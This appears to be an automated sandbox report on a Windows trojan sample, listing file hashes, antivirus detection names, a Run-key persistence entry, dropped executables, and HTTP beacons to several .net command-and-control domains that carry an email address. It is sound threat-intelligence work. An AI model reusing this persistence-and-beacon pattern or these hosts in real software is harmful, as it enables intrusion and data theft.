Analysis Date: 2015-07-29 04:55:35
MD5: 9ffb9f08581716ab9754c6d60527ca36
SHA1: b6e31e1875c2f5cd7a048cf909ced15b52579e41

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 66d069ca2e2c76f3f99747d7ad78acc4 sha1: 4fef505c8f516e96ec8709d551853f128ae6c8ef size: 300032
Section .rdata: md5: 91dc4e30e5e4c1e0316163301a9a8f46 sha1: db8e3cdc34beaae4f780f3d5e459f5afc40cb13c size: 34304
Section .data: md5: 02915f511ba1fce77995e3574591b014 sha1: 55bbe239b2071cceac826ef385e1d67fc2960012 size: 93696
Timestamp: 2014-10-30 09:51:36
Packer: Microsoft Visual C++ ?.?
PEhash: b36f93beafae9716a4db7c4ea8394f3dc5b45db4
IMPhash: 71ae2e969df7fc166f638e08effd51a9
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader14.61837
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: no_virus
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Kryptik-PJW [Trj]
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): TR/ATRAPS.Gen2
AV Mcafee: Trojan-FEMT!9FFB9F085817
AV Rising: 0x57a70112

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Update PC Portable Input ➝ C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.ehf3d
Creates File: C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wamybqu.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe"

Network Details:

HTTP GET: http://knownstream.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://summerstream.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://crowdstream.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://crowdnothing.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://thoughtstream.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://waterstream.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://waterbottle.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://fightstream.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://partybottle.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://freshbusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://experiencebusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://summerbusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://crowdbusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
HTTP GET: http://summerappear.net/index.php?email=sales5@furui-gifts.com&method=post&len (User-Agent: empty)
Flows TCP: 192.168.1.1:1031 ➝ 74.208.56.10:80
Flows TCP: 192.168.1.1:1032 ➝ 66.96.132.53:80
Flows TCP: 192.168.1.1:1033 ➝ 184.168.221.61:80
Flows TCP: 192.168.1.1:1034 ➝ 208.91.197.241:80
Flows TCP: 192.168.1.1:1035 ➝ 50.63.202.54:80
Flows TCP: 192.168.1.1:1036 ➝ 91.198.165.243:80
Flows TCP: 192.168.1.1:1037 ➝ 209.15.13.134:80
Flows TCP: 192.168.1.1:1038 ➝ 184.168.221.32:80
Flows TCP: 192.168.1.1:1039 ➝ 91.215.216.53:80
Flows TCP: 192.168.1.1:1040 ➝ 72.52.4.120:80
Flows TCP: 192.168.1.1:1041 ➝ 188.40.135.139:80
Flows TCP: 192.168.1.1:1042 ➝ 129.119.80.195:80
Flows TCP: 192.168.1.1:1043 ➝ 184.168.221.104:80
Flows TCP: 192.168.1.1:1044 ➝ 95.211.230.75:80

Raw Pcap

Strings